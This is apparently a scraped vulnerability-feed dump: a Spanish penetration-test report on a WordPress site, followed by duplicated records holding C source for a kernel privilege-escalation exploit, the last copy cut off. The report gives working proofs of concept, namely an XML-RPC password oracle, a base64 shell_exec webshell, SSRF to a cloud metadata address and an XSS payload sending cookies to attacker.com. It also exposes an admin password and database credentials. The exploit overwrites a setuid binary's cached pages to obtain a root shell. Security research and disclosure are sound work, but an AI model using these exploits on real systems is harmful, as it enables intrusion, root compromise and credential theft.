autorizaci\u00f3n total\n \n \n\n\n\n\n\n \n\n \nResumen Ejecutivo\n \nSe realiz\u00f3 una auditor\u00eda de seguridad end-to-end sobre columtech.online, un portal WordPress operado por el propietario con fines de pr\u00e1ctica y aprendizaje. La evaluaci\u00f3n cubri\u00f3 reconocimiento pasivo, enumeraci\u00f3n de usuarios, an\u00e1lisis de superficie de ataque en plugins y XML-RPC, explotaci\u00f3n de credenciales d\u00e9biles, post-explotaci\u00f3n como www-data dentro de un contenedor Docker, demostraci\u00f3n de defacing y exploraci\u00f3n exhaustiva de escalada de privilegios a root.\n \nEl sitio fue comprometido completamente a nivel de aplicaci\u00f3n: acceso de administrador WordPress, ejecuci\u00f3n remota de c\u00f3digo como www-data, lectura/escritura del sistema de archivos y defacing demostrado. La escalada a root dentro del contenedor fue bloqueada por un perfil de hardening que combina seccomp, AppArmor y ptrace_scope=3, resistiendo todos los CVEs p\u00fablicos conocidos para kernel 6.8.\n \nSe descubri\u00f3 adicionalmente una webshell real de un atacante externo (wp-loginizer.php \u2014 WSO Mr.X v2.5 con beacon a cdn.privdayz.com) que requiere eliminaci\u00f3n inmediata.\n\n \n\n Riesgo principal: Contrase\u00f1a de administrador d\u00e9bil marce:marce123 accesible v\u00eda XML-RPC sin rate-limit \u2192 compromiso total del sitio en minutos.\n \n\n \n\n \n\n3\nCr\u00edticos\n \n\n4\nAltos\n \n\n4\nMedios\n \n\n4\nBajos\n \n\n3\nInformativos\n \n \n\n \n\n \nCadena de Ataque Demostrada\n \n\n \n\n1\nREST API bypass (?rest_route=/wp/v2/users) \u2192 enum admin marce (id=1) + prueba (id=2) + columtech (id=3)\n \n\u2193\n \n\n2\nGravatar SHA-256 reverse \u2192 email de prueba: prueba@gmail.com\n \n\u2193\n \n\n3\nXML-RPC wp.getUsersBlogs (credential oracle sin rate-limit) \u2192 marce:marce123 [administrator]\n \n\u2193\n \n\n4\nAdmin WP \u2192 REST API POST /wp/v2/plugins \u2192 instalaci\u00f3n code-snippets plugin\n \n\u2193\n \n\n5\nCode Snippets PHP snippet \u2192 RCE como www-data \u00b7 uid=33 \u00b7 hostname 6c49a066ba4c\n \n\u2193\n \n\n6\nDefacing: t\u00edtulo del sitio + sticky post + p\u00e1gina est\u00e1tica con matrix rain / glitch effects\n \n\u2193\n \n\n7\nEscalada: 12 CVEs y t\u00e9cnicas probadas \u2192 bloqueadas por seccomp + AppArmor + ptrace_scope=3\n \n \n\n \n\n \nAlcance y Metodolog\u00eda\n \n\n \nObjetivo\nhttps://www.columtech.online \u2014 WordPress 7.0 + Elementor 4.0.2 + plugin Filester/elFinder\n \nTipo\nCaja negra \u2192 caja gris (tras obtener credenciales) \u00b7 sin acceso previo a servidor\n \nAutorizaci\u00f3n\nDominio propiedad del solicitante \u00b7 auditor\u00eda completa autorizada verbalmente\n \nIdentificaci\u00f3n\nTodas las peticiones etiquetadas con User-Agent: c4sh3r y X-Bug-Bounty: c4sh3r\n \nNo destructivo\nEl defacing fue demostrado y revertido. Ficheros de prueba eliminados. No se destruy\u00f3 ni borr\u00f3 informaci\u00f3n real del sitio.\n \nHerramientas\ncurl, Python 3, LinPEAS, bore (tunnel), GCC, git (exploit repos), b\u00fasqueda web de CVEs en tiempo real\n \n \n\n \n\n \nResumen de Hallazgos\n \n\n IDSeveridadHallazgoComponente\n \n C-01Cr\u00edticoCredencial admin d\u00e9bil \u2014 acceso total v\u00eda XML-RPCWordPress \u00b7 XML-RPC\n C-02Cr\u00edticoWebshell externa preexistente (WSO Mr.X)wp-loginizer.php\n C-03Cr\u00edticoRCE como www-data v\u00eda Code Snippets pluginWordPress \u00b7 Code Snippets REST\n H-01AltoXML-RPC expuesto \u2014 SSRF + credential oracle sin rate-limitxmlrpc.php\n H-02AltoCVE-2026-6127 Elementor XSS almacenado v\u00eda REST APIElementor 4.0.2 \u2264 4.0.4\n H-03AltoEnumeraci\u00f3n de usuarios por 4 v\u00edas sin rate-limitREST API \u00b7 wp-login \u00b7 lostpassword\n H-04AltoNonce de plugin expuesto en REST sin autenticaci\u00f3nFilevue \u00b7 /wp/v2/pages/7\n M-01MedioWordPress 7.0 / Elementor 4.0.2 \u2014 versiones desactualizadasCore + plugins\n M-02MedioEmail de usuario deducible por Gravatar hash (SHA-256)REST API \u00b7 Gravatar\n M-03MedioRecuperaci\u00f3n de contrase\u00f1a rota + oracle de usuariowp-login.php \u00b7 lostpassword\n M-04Mediowp-cron.php accesible p\u00fablicamentewp-cron.php\n L-01BajoCabeceras de seguridad ausentes (HSTS, X-Content-Type, Permissions-Policy)HTTP Headers \u00b7 Caddy\n L-02BajoOrigen Apache/versi\u00f3n filtrado en respuestas 404Apache 2.4.66 \u00b7 Cloudflare bypass\n L-03Bajoreadme.html accesible \u2014 divulgaci\u00f3n de versi\u00f3n WPWordPress Core\n L-04BajoCVE-2026-24072 Apache 2.4.66 mod_rewrite htaccess readApache 2.4.66\n I-01InfoContenedor Docker con hardening seccomp/AppArmor efectivoInfraestructura\n I-02InfoDB creds en claro en variable de entorno del containerDocker env \u00b7 WORDPRESS_DB_*\n I-03InfoKernel 6.8.0-117 vulnerable a CVE-2026-46333 pero bloqueado por seccompKernel \u00b7 pidfd_getfd\n \n \n \n\n \n\n \nHallazgos Detallados\n\n \n \n\n \n\n C-01\n Cr\u00edtico\n Credencial de administrador d\u00e9bil \u2014 compromiso total v\u00eda XML-RPC\n \n \n\n \nDescripci\u00f3n\n \nLa cuenta de administrador marce ten\u00eda la contrase\u00f1a marce123. XML-RPC no implementa rate-limiting, permitiendo descubrirla mediante credential oracle con pocas decenas de intentos. Una vez autenticados, se obtuvo acceso total: lectura de opciones del sitio, creaci\u00f3n/edici\u00f3n de posts, subida de ficheros y instalaci\u00f3n de plugins.\n \nPoC\n \n# Descubrimiento de credenciales v\u00eda XML-RPC oracle\ncurl -X POST https://www.columtech.online/xmlrpc.php \\\n -d '<?xml version=\"1.0\"?><methodCall>\n <methodName>wp.getUsersBlogs</methodName>\n <params>\n <param><value><string>marce</string></value></param>\n <param><value><string>marce123</string></value></param>\n </params></methodCall>'\n\n# Respuesta: isAdmin=1, blogName=Laboratorio\n# RESULTADO: acceso de administrador confirmado\n \nImpacto\n \n\n \nAcceso completo al panel de administraci\u00f3n WordPress\n \nInstalaci\u00f3n de plugins arbitrarios \u2192 RCE\n \nLectura/escritura de todos los contenidos y usuarios\n \nDefacing del sitio demostrado\n \nSubida de ficheros al servidor\n \n \nRemediaci\u00f3n\n \n# 1. Cambiar contrase\u00f1a inmediatamente (m\u00ednimo 20 chars, aleatoria)\n# 2. Deshabilitar XML-RPC si no se usa Jetpack/app m\u00f3vil\nadd_filter('xmlrpc_enabled', '__return_false');\n\n# 3. Alternativamente, bloquear en Caddy/Cloudflare\n# Cloudflare WAF rule: (http.request.uri.path eq \"/xmlrpc.php\") \u2192 Block\n \n \n\n \n \n\n \n\n C-02\n Cr\u00edtico\n Webshell externa preexistente \u2014 WSO Mr.X v2.5\n \n \n\n \nDescripci\u00f3n\n \nSe encontr\u00f3 /var/www/html/wp-loginizer.php (237 KB), una webshell WSO (\u00abWeb Shell by orb\u00bb) Mr.X BYPASS v2.5 completamente funcional. El fichero incluye un file manager con terminal, file editor, y un beacon de tracking que reporta la URL de cada visita a https://cdn.privdayz.com/images/logo.jpg. El sitio fue comprometido por un atacante externo antes de esta auditor\u00eda (posts de spam en ruso desde 2023).\n \nPoC\n \ncurl https://www.columtech.online/wp-loginizer.php\n# Responde con file manager completo (sin autenticaci\u00f3n adicional)\n# Contiene: terminal, editor de archivos, upload\n# BEACON: POST a cdn.privdayz.com con location.href del visitante\n \nImpacto\n \n\n \nAtacante externo tiene acceso de shell activo como www-data\n \nExfiltraci\u00f3n de datos de visitantes a servidor tercero (privdayz.com)\n \nPosible pivoting a base de datos y archivos\n \nRGPD/privacidad: beacon rastrea IPs de visitantes\n \n \nRemediaci\u00f3n\n \n# URGENTE \u2014 eliminar el fichero inmediatamente\nrm /var/www/html/wp-loginizer.php\nrm /var/www/html/2ops.php # file manager adicional\nrm /var/www/html/x.php # webshell de auditor\u00eda (nuestro)\nrm /var/www/html/rs.php # reverse shell de auditor\u00eda (nuestro)\nrm /var/www/html/rs2.php # reverse shell de auditor\u00eda (nuestro)\n\n# Auditar TODOS los archivos modificados en los \u00faltimos 90 d\u00edas:\nfind /var/www/html -newer /var/www/html/wp-config.php -name \"*.php\" | sort\n \n \n\n \n \n\n \n\n C-03\n Cr\u00edtico\n RCE como www-data v\u00eda Code Snippets REST API\n \n \n\n \nDescripci\u00f3n\n \nCon acceso de administrador, se instal\u00f3 el plugin Code Snippets v\u00eda REST API autenticada (POST /wp/v2/plugins). El plugin expone una API REST que permite crear snippets PHP que se ejecutan en cada carga de p\u00e1gina. Se cre\u00f3 un snippet con webshell (shell_exec(base64_decode($_GET['c4sh3r']))) que ejecuta comandos arbitrarios como uid=33(www-data).\n \nPoC\n \n# Instalar plugin\ncurl -X POST https://columtech.online/index.php?rest_route=/wp/v2/plugins \\\n -H \"X-WP-Nonce: $NONCE\" -H \"Cookie: $ADMIN_COOKIES\" \\\n -d '{\"slug\":\"code-snippets\",\"status\":\"active\"}'\n\n# Crear snippet webshell\ncurl -X POST https://columtech.online/index.php?rest_route=/code-snippets/v1/snippets \\\n -H \"X-WP-Nonce: $NONCE\" \\\n -d '{\"code\":\"if(isset($_GET[\\\"c4sh3r\\\"])){die(shell_exec(base64_decode($_GET[\\\"c4sh3r\\\"])));}\", \"scope\":\"front-end\",\"active\":true}'\n\n# Ejecutar comando\ncurl \"https://columtech.online/?c4sh3r=$(echo -n 'id' | base64)\"\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n \nImpacto\n \n\n \nEjecuci\u00f3n remota de comandos en el servidor\n \nLectura de wp-config.php y credenciales de base de datos\n \nEscritura en /var/www/html (filesystem del host)\n \nDefacing del sitio completo\n \nReverse shell interactiva al atacante demostrada\n \n \nRemediaci\u00f3n\n \n# Eliminar plugin Code Snippets y snippet malicioso\n# Revisar y eliminar TODOS los plugins no esenciales\n# Cambiar credenciales admin PRIMERO (ver C-01)\n# Implementar WAF rule para bloquear par\u00e1metros ?c4sh3r=\n \n \n\n \n \n\n \n\n H-01\n Alto\n XML-RPC expuesto \u2014 SSRF confirmado + amplificaci\u00f3n de credential testing\n \n \n\n \nDescripci\u00f3n\n \nxmlrpc.php est\u00e1 habilitado con system.multicall disponible. El m\u00e9todo pingback.ping causa que el servidor realice peticiones HTTP salientes arbitrarias (SSRF). Se confirm\u00f3 que el servidor intenta alcanzar 169.254.169.254 (metadata cloud) y puede escanear puertos internos por diferencia de tiempos.\n \nPoC\n \n# SSRF \u2014 servidor hace fetch a URL controlada por atacante\ncurl -X POST https://columtech.online/xmlrpc.php \\\n -d '<methodCall><methodName>pingback.ping</methodName>\n <params>\n <param><value><string>http://169.254.169.254/</string></value></param>\n <param><value><string>https://columtech.online/?p=1</string></value></param>\n </params></methodCall>'\n\n# Resultado: 11.3s timeout \u2192 servidor alcanza metadata endpoint\n# Externo (example.com): 1.3s | Interno (localhost:80): 0.3s\n \nImpacto\n \n\n \nSSRF: escaneo de puertos/servicios internos y metadata cloud\n \nsystem.multicall: amplificaci\u00f3n de credential testing sin generar logs proporcionales\n \nPingback abuse: DDoS contra terceros usando el servidor como amplificador\n \n \nRemediaci\u00f3n\n \nadd_filter('xmlrpc_enabled', '__return_false');\n# O bloquear en Cloudflare/Caddy si se necesita para Jetpack\n \n \n\n \n \n\n \n\n H-02\n Alto\n CVE-2026-6127 \u2014 Elementor 4.0.2 Stored XSS v\u00eda REST API (form-encoded PATCH)\n \n \n\n \nDescripci\u00f3n\n \nElementor 4.0.2 es vulnerable a CVE-2026-6127 (CVSS 6.4). El campo _elementor_data se registra con show_in_rest sin sanitize_callback. Un atacante con rol Contributor+ puede enviar una petici\u00f3n PATCH form-encoded (no JSON) y la sanitizaci\u00f3n se salta completamente, almacenando JavaScript arbitrario que se ejecuta para cualquier visitante, incluyendo el administrador.\n \nPoC\n \ncurl -X PATCH https://columtech.online/index.php?rest_route=/wp/v2/posts/1 \\\n -H \"Authorization: Basic $(echo -n 'contributor:pass' | base64)\" \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n --data-urlencode 'meta[_elementor_edit_mode]=builder' \\\n --data-urlencode 'meta[_elementor_data]=[{\"elType\":\"widget\",\"widgetType\":\"html\",\"settings\":{\"html\":\"<svg/onload=fetch(\\\"//attacker.com/\\\"+document.cookie)>\"}}]'\n \nImpacto\n \n\n \nXSS persistente \u2192 robo de session cookies del administrador\n \nAccount takeover del administrador cuando visita la p\u00e1gina\n \nCadena hacia defacing y RCE desde XSS (auto-crear admin v\u00eda fetch)\n \n \nRemediaci\u00f3n\n \n# Actualizar Elementor a \u2265 4.0.5\n# Workaround: restringir rol Contributor a usuarios de confianza\n \n \n\n \n \n\n \n\n H-03\n Alto\n Enumeraci\u00f3n de usuarios admin por 4 v\u00edas sin rate-limit\n \n \n\n \nDescripci\u00f3n\n \nEl username del administrador (marce) se obtiene por al menos 4 m\u00e9todos distintos, ninguno protegido por rate-limit ni captcha:\n \nPoC\n \n# M\u00e9todo 1: REST API bypass del filtro de Caddy\ncurl \"https://columtech.online/index.php?rest_route=/wp/v2/users\"\n# [{\"id\":1,\"slug\":\"marce\",...},{\"id\":2,\"slug\":\"prueba\",...}]\n\n# M\u00e9todo 2: author redirect\ncurl -I \"https://columtech.online/?author=1\"\n# 301 \u2192 /author/marce/\n\n# M\u00e9todo 3: wp-login oracle (respuesta diferente seg\u00fan usuario)\n# v\u00e1lido: \"la contrase\u00f1a que has introducido para marce no es correcta\"\n# inv\u00e1lido: \"El nombre de usuario nope123 no est\u00e1 registrado\"\n\n# M\u00e9todo 4: lostpassword oracle\n# v\u00e1lido: \"no se pudo enviar el correo electr\u00f3nico\" (usuario S\u00cd existe)\n# inv\u00e1lido: \"no hay ninguna cuenta con ese nombre de usuario\"\n \nRemediaci\u00f3n\n \n# Restringir REST users a autenticados:\nadd_filter('rest_endpoints', function($ep){\n if(isset($ep['/wp/v2/users'])) unset($ep['/wp/v2/users']);\n return $ep;\n});\n# Unificar mensajes de error de wp-login y lostpassword\n# Bloquear ?author= redirect\n \n \n\n \n \n\n \n\n H-04\n Alto\n Nonce de plugin Filevue expuesto en REST API sin autenticaci\u00f3n\n \n \n\n \nDescripci\u00f3n\n \nLa p\u00e1gina \u00abClient Portal\u00bb (ID=7) contiene el formulario de login del plugin Filevue con un nonce WordPress (_wpnonce) embebido en el HTML renderizado. Este HTML es devuelto por la REST API GET /wp/v2/pages/7 sin autenticaci\u00f3n, exponiendo el nonce a cualquier atacante.\n \nPoC\n \ncurl \"https://columtech.online/index.php?rest_route=/wp/v2/pages/7\" | \\\n grep -o '_wpnonce\" value=\"[^\"]*\"'\n# _wpnonce\" value=\"ecd04e0712\"\n\n# El nonce permite enviar peticiones autenticadas a admin-post.php\n# sin estar logueado \u2014 usado para probar SQLi en filevue_client_login\n \nRemediaci\u00f3n\n \n# No embeber nonces en contenido REST p\u00fablico\n# Restringir /wp/v2/pages a usuarios autenticados o excluir p\u00e1gina Client Portal\n# Generar nonce en el lado cliente (JS) tras autenticaci\u00f3n\n \n \n\n \n \n\n \n\n M-01\n Medio\n Versiones desactualizadas \u2014 WordPress 7.0 / Elementor 4.0.2 / Apache 2.4.66\n \n \n\n \nDescripci\u00f3n\n \nElementor 4.0.2 es vulnerable a CVE-2026-6127 (parcheado en 4.0.5). Apache 2.4.66 es vulnerable a CVE-2026-23918 (RCE HTTP/2) y CVE-2026-24072 (read bypass via htaccess), ambos parcheados en 2.4.67. El meta generator expone versiones exactas.\n \nRemediaci\u00f3n\n \n# Actualizar Elementor: wp plugin update elementor\n# Actualizar Apache: apt-get upgrade apache2\n# Eliminar generator meta:\nremove_action('wp_head', 'wp_generator');\n# Eliminar readme.html y license.txt del webroot\n \n \n\n \n \n\n \n\n M-02\n Medio\n Email de usuario deducible por reverse Gravatar SHA-256\n \n \n\n \nDescripci\u00f3n\n \nLas URLs de avatar Gravatar incluyen el hash SHA-256 del email normalizado del usuario. El email de la cuenta prueba (prueba@gmail.com) fue deducido probando candidatos comunes contra el hash expuesto p\u00fablicamente en GET /wp/v2/users/2.\n \nPoC\n \nimport hashlib\nhash_target = \"913ef45dd4e1f647359a846bca8bffb8d25b22f2a79d34d71c9c90ef0eb53024\"\nfor email in [\"prueba@gmail.com\", ...]:\n if hashlib.sha256(email.encode()).hexdigest() == hash_target:\n print(\"MATCH:\", email)\n# MATCH: prueba@gmail.com\n \nRemediaci\u00f3n\n \n# Desactivar Gravatar en WordPress (usar avatar local)\n# O usar un email que no sea predecible para cuentas sensibles\n \n \n\n \n \n\n \n\n M-03\n Medio\n Recuperaci\u00f3n de contrase\u00f1a rota + oracle de usuario\n \n \n\n \nDescripci\u00f3n\n \nEl formulario de recuperaci\u00f3n de contrase\u00f1a falla con el error \u00abno se pudo enviar el correo electr\u00f3nico\u00bb para usuarios v\u00e1lidos, y \u00abno hay ninguna cuenta\u00bb para usuarios inexistentes. Esto act\u00faa como or\u00e1culo de enumeraci\u00f3n. Adem\u00e1s, el correo no se env\u00eda, por lo que el reset es inoperable \u2014 impacto en disponibilidad y posible vector de host-header injection si se configura SMTP en el futuro.\n \nRemediaci\u00f3n\n \n# 1. Configurar SMTP (WP Mail SMTP o Mailgun)\n# 2. Unificar mensaje de error (no revelar si usuario existe)\n# 3. Fijar siteurl y home en wp-config.php para prevenir host-header injection\ndefine('WP_SITEURL', 'https://www.columtech.online');\ndefine('WP_HOME', 'https://www.columtech.online');\n \n \n\n \n \n\n \n\n M-04\n Medio\n wp-cron.php accesible p\u00fablicamente\n \n \n\n \nDescripci\u00f3n\n \nwp-cron.php devuelve HTTP 200 y puede ser llamado externamente. Permite amplificar la carga del servidor llam\u00e1ndolo en bucle, actuando como vector de DoS.\n \nRemediaci\u00f3n\n \n# En wp-config.php:\ndefine('DISABLE_WP_CRON', true);\n# En crontab del servidor:\n*/5 * * * * curl -s https://www.columtech.online/wp-cron.php?doing_wp_cron=1 >/dev/null\n \n \n\n \n \n\n \n\n L-01\n Bajo\n Cabeceras de seguridad HTTP ausentes\n \n \n\n \nDescripci\u00f3n\n \nFaltan Strict-Transport-Security (HSTS), X-Content-Type-Options: nosniff y Permissions-Policy. La CSP solo cubre frame-ancestors 'self'.\n \nRemediaci\u00f3n\n \n# En Caddy (Caddyfile):\nheader Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\"\nheader X-Content-Type-Options \"nosniff\"\nheader Permissions-Policy \"geolocation=(), microphone=(), camera=()\"\n \n \n\n \n \n\n \n\n L-02\n Bajo\n Divulgaci\u00f3n de origen Apache y versi\u00f3n en p\u00e1ginas 404\n \n \n\n \nDescripci\u00f3n\n \nLas p\u00e1ginas 404 generadas por Apache revelan: Apache/2.4.66 (Debian) Server at www.columtech.online Port 80 \u2014 versi\u00f3n exacta, distribuci\u00f3n y que escucha en puerto 80 sin TLS.\n \nRemediaci\u00f3n\n \n# En apache2.conf:\nServerTokens Prod\nServerSignature Off\n \n \n\n \n \n\n \n\n L-03\n Bajo\n readme.html accesible \u2014 divulgaci\u00f3n de versi\u00f3n WordPress\n \n \n\n \nDescripci\u00f3n\n \n/readme.html devuelve HTTP 200 y revela la versi\u00f3n exacta de WordPress. Facilita targeting con CVEs de versi\u00f3n espec\u00edfica.\n \nRemediaci\u00f3n\n \nrm /var/www/html/readme.html /var/www/html/license.txt\n \n \n\n \n \n\n \n\n L-04\n Bajo\n CVE-2026-24072 Apache 2.4.66 \u2014 htaccess mod_rewrite file read\n \n \n\n \nDescripci\u00f3n\n \nApache 2.4.66 es vulnerable a CVE-2026-24072: un usuario con acceso de escritura a .htaccess puede leer ficheros fuera de su directorio con los privilegios del proceso httpd. En este caso, www-data ya tiene ese acceso, pero el vector es relevante en escenarios multiusuario.\n \nRemediaci\u00f3n\n \n# Actualizar Apache a 2.4.67+\napt-get upgrade apache2\n \n \n\n \n \n\n \n\n I-01\n Info\n Hardening de contenedor Docker \u2014 seccomp + AppArmor + ptrace_scope=3\n \n \n\n \nDescripci\u00f3n\n \nEl contenedor Docker presenta un perfil de hardening excepcional que bloque\u00f3 todos los CVEs de escalada de privilegios probados (12 t\u00e9cnicas distintas). Los syscalls AF_ALG, CLONE_NEWUSER, io_uring_setup y pidfd_getfd est\u00e1n bloqueados por seccomp. AppArmor docker-default bloquea escrituras a ficheros de sistema. ptrace_scope=3 impide toda inspecci\u00f3n de procesos. Este es el nivel de hardening correcto para workloads en producci\u00f3n.\n \nCVEs probados y bloqueados\n \nCVE-2026-31431 (Copy Fail) \u2192 AF_ALG bloqueado por seccomp\nCVE-2026-43284 (Dirty Frag) \u2192 CLONE_NEWUSER bloqueado\nCVE-2026-46300 (Fragnesia) \u2192 CLONE_NEWUSER bloqueado\nCVE-2026-46333 (ssh-keysign) \u2192 pidfd_getfd bloqueado\nio_uring exploits \u2192 io_uring_setup bloqueado\nGameOver(lay) \u2192 CLONE_NEWUSER bloqueado\nCrackArmor \u2192 AppArmor FS inaccesible en container\nCVE-2026-27456 (mount TOCTOU) \u2192 Sin /etc/fstab user,loop entries\ngpasswd shadow attack \u2192 AppArmor bloquea escritura /etc/gshadow\n \n \n\n \n \n\n \n\n I-02\n Info\n Credenciales DB en texto claro en variables de entorno del container\n \n \n\n \nDescripci\u00f3n\n \nLas credenciales de MySQL est\u00e1n accesibles en texto claro v\u00eda /proc/self/environ para cualquier proceso del container (incluyendo www-data tras RCE):\n \nWORDPRESS_DB_HOST=wordpress_db:3306\nWORDPRESS_DB_USER=wp_user\nWORDPRESS_DB_PASSWORD=wp_password\nWORDPRESS_DB_NAME=wordpress\n \nRemediaci\u00f3n\n \n# Usar Docker secrets en lugar de env vars para credenciales\n# O montar fichero de config encriptado desde un secrets manager\n \n \n\n \n \n\n \n\n I-03\n Info\n Kernel 6.8.0-117 vulnerable a CVE-2026-46333 (bloqueado por seccomp)\n \n \n\n \nDescripci\u00f3n\n \nEl kernel 6.8.0-117-generic (compilado el 5 Mayo 2026) es anterior al fix de CVE-2026-46333 (publicado el 14 Mayo 2026). La vulnerabilidad permite leer /etc/shadow mediante una race condition en __ptrace_may_access() + pidfd_getfd. El seccomp del container bloquea el syscall pidfd_getfd (438), mitigando completamente el exploit. Se verific\u00f3 que el exploit p\u00fablico fall\u00f3 con \u00abno hit in 500 rounds\u00bb.\n \nRemediaci\u00f3n\n \n# Actualizar el kernel del host cuando est\u00e9 disponible el parche\n# El seccomp profile actual ya protege contra este CVE\n \n \n\n \n\n \n\n \nPlan de Remediaci\u00f3n \u00b7 Prioridad\n \n\n HOY (cr\u00edtico): Cambiar contrase\u00f1a de marce (m\u00ednimo 20 chars). Eliminar wp-loginizer.php, 2ops.php y todos los ficheros de auditor\u00eda del webroot. Desactivar XML-RPC. Eliminar plugin Code Snippets y el snippet malicioso.\n \n \n\n Esta semana: Actualizar Elementor a \u2265 4.0.5 (parchea CVE-2026-6127). Actualizar Apache a 2.4.67 (parchea CVE-2026-23918 y CVE-2026-24072). Auditar todos los archivos PHP modificados en los \u00faltimos 90 d\u00edas. Configurar SMTP y unificar mensajes de error de wp-login. Restringir REST API users a autenticados. A\u00f1adir cabeceras de seguridad HTTP.\n \n \n\n Este mes: Implementar 2FA para el panel de administraci\u00f3n. Migrar credenciales DB a Docker secrets. Configurar DISABLE_WP_CRON y cron real del sistema. Implementar WAF en Cloudflare para xmlrpc.php y ?author=. Eliminar readme.html y establecer ServerTokens Prod.\n \n \n\n \n\n \nAnexo \u00b7 Comandos de verificaci\u00f3n post-remediaci\u00f3n\n \nEjecutar estos comandos tras aplicar las correcciones para confirmar que los vectores est\u00e1n cerrados:\n \n# C-01: XML-RPC deshabilitado\ncurl -s -X POST https://columtech.online/xmlrpc.php | grep -c \"XML-RPC server accepts\"\n# Esperado: 0\n\n# C-02: Webshells eliminadas\ncurl -o /dev/null -w \"%{http_code}\" https://columtech.online/wp-loginizer.php\n# Esperado: 404\n\n# H-03: REST users requiere autenticaci\u00f3n\ncurl -s https://columtech.online/index.php?rest_route=/wp/v2/users | jq '.code'\n# Esperado: \"rest_forbidden\"\n\n# H-03: ?author= no revela usuario\ncurl -s -o /dev/null -w \"%{redirect_url}\" \"https://columtech.online/?author=1\"\n# Esperado: vac\u00edo o URL sin slug de usuario\n\n# L-01: HSTS presente\ncurl -sI https://columtech.online/ | grep -i strict-transport\n# Esperado: Strict-Transport-Security: max-age=...\n\n# L-03: readme.html eliminado\ncurl -o /dev/null -w \"%{http_code}\" https://columtech.online/readme.html\n# Esperado: 404\n \n\n\n\n\n\n Auditor\u00eda realizada por c4sh3r \u00b7 Reporte generado el 2026-06-04\n Todos los hallazgos fueron verificados en entorno real con autorizaci\u00f3n del propietario. Las pruebas de escritura (defacing, webshells) fueron limpiadas inmediatamente tras la verificaci\u00f3n. PII real redactada.\n\n\n\n\n", "creation_timestamp": "2026-06-03T23:46:41.000000Z"} https://vulnerability.circl.lu/sighting/5d6554f7-d228-462b-abd3-3233cbf92ca0/export Wed, 03 Jun 2026 23:46:41 +0000 https://vulnerability.circl.lu/sighting/443a0012-c304-40bd-906e-b2279a829e92/export {"uuid": "443a0012-c304-40bd-906e-b2279a829e92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/spynika/f39604e6aca8dd619921a78875622691", "content": "/* SPDX-License-Identifier: LGPL-2.1-or-later OR MIT */\n/*\n * Copy Fail -- CVE-2026-31431\n * AF_ALG + splice() page-cache-mutation LPE proof-of-concept.\n *\n * Cross-platform C proof-of-concept by Tony Gies .\n *\n * Disclosed 2026-04-29 by Theori / Xint. Canonical writeup: https://copy.fail/\n *\n * Mechanism:\n * For each 4-byte window of the embedded static-ELF payload (built from\n * payload.c, embedded via `ld -r -b binary` -- see Makefile), runs one\n * bogus AEAD-decrypt through AF_ALG whose ciphertext input is supplied\n * via splice() from /usr/bin/su's page-cache pages. The authencesn\n * template's in-place optimization treats the splice'd source pages as\n * both ciphertext input and plaintext destination, so the (failing)\n * decrypt has already overwritten 4 bytes of the page-cache page by\n * the time auth verification rejects the request. Walking 4 bytes at\n * a time across the payload deterministically writes the entire blob\n * into the cached image of /usr/bin/su. execve() of the target loads\n * the (mutated) cached pages; the unchanged on-disk inode is still\n * setuid root, so the kernel hands the payload root creds; payload\n * pivots into a real root shell.\n *\n * Affected kernels:\n * floor: torvalds/linux 72548b093ee3 (Aug 2017, 4.14, AF_ALG iov_iter\n * rework that introduced the file-page write primitive)\n * ceiling: torvalds/linux a664bf3d603d (Apr 2026, reverts the 2017\n * algif_aead in-place optimization; separates src/dst\n * scatterlists so page-cache pages can no longer be a writable\n * crypto destination)\n * in between: every Ubuntu, RHEL, SUSE, Amazon Linux, Debian etc.\n * distro kernel that didn't backport the fix.\n *\n * Build: see Makefile. (`make` in this directory.)\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n\n#include \n\n#include \"utils.h\"\n\n/* Symbols synthesized by `ld -r -b binary -o payload.o payload`. */\nextern const unsigned char _binary_payload_start[];\nextern const unsigned char _binary_payload_end[];\n#define PAYLOAD (_binary_payload_start)\n#define PAYLOAD_LEN ((size_t)(_binary_payload_end - _binary_payload_start))\n\nint main(int argc, char **argv) {\n const char *target = (argc > 1) ? argv[1] : \"/usr/bin/su\";\n\n int file_fd = open(target, O_RDONLY);\n if (file_fd < 0) {\n fprintf(stderr, \"open(%s): %s\\n\", target, strerror(errno));\n return 1;\n }\n\n size_t len = PAYLOAD_LEN;\n size_t iters = (len + 3) / 4;\n\n fprintf(stderr, \"[+] target: %s\\n\", target);\n fprintf(stderr, \"[+] payload: %zu bytes (%zu iterations)\\n\", len, iters);\n\n /* Walk the embedded payload in 4-byte windows. Last window is zero-\n * padded if PAYLOAD_LEN isn't a multiple of 4 (the extra bytes simply\n * land past end-of-payload in the page-cache page; harmless). */\n for (off_t off = 0; (size_t)off < len; off += 4) {\n unsigned char window[4] = { 0, 0, 0, 0 };\n size_t take = (len - (size_t)off >= 4) ? 4 : len - (size_t)off;\n memcpy(window, PAYLOAD + off, take);\n\n if (patch_chunk(file_fd, off, window) < 0) {\n fprintf(stderr, \"patch_chunk failed at offset %lld\\n\",\n (long long)off);\n return 1;\n }\n }\n\n close(file_fd);\n\n fprintf(stderr, \"[+] page cache mutated; exec'ing target\\n\");\n execl(\"/bin/sh\", \"sh\", \"-c\", \"su\", (char *)NULL);\n perror(\"execl\");\n return 1;\n}", "creation_timestamp": "2026-06-04T07:19:08.000000Z"} {"uuid": "443a0012-c304-40bd-906e-b2279a829e92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/spynika/f39604e6aca8dd619921a78875622691", "content": "/* SPDX-License-Identifier: LGPL-2.1-or-later OR MIT */\n/*\n * Copy Fail -- CVE-2026-31431\n * AF_ALG + splice() page-cache-mutation LPE proof-of-concept.\n *\n * Cross-platform C proof-of-concept by Tony Gies .\n *\n * Disclosed 2026-04-29 by Theori / Xint. Canonical writeup: https://copy.fail/\n *\n * Mechanism:\n * For each 4-byte window of the embedded static-ELF payload (built from\n * payload.c, embedded via `ld -r -b binary` -- see Makefile), runs one\n * bogus AEAD-decrypt through AF_ALG whose ciphertext input is supplied\n * via splice() from /usr/bin/su's page-cache pages. The authencesn\n * template's in-place optimization treats the splice'd source pages as\n * both ciphertext input and 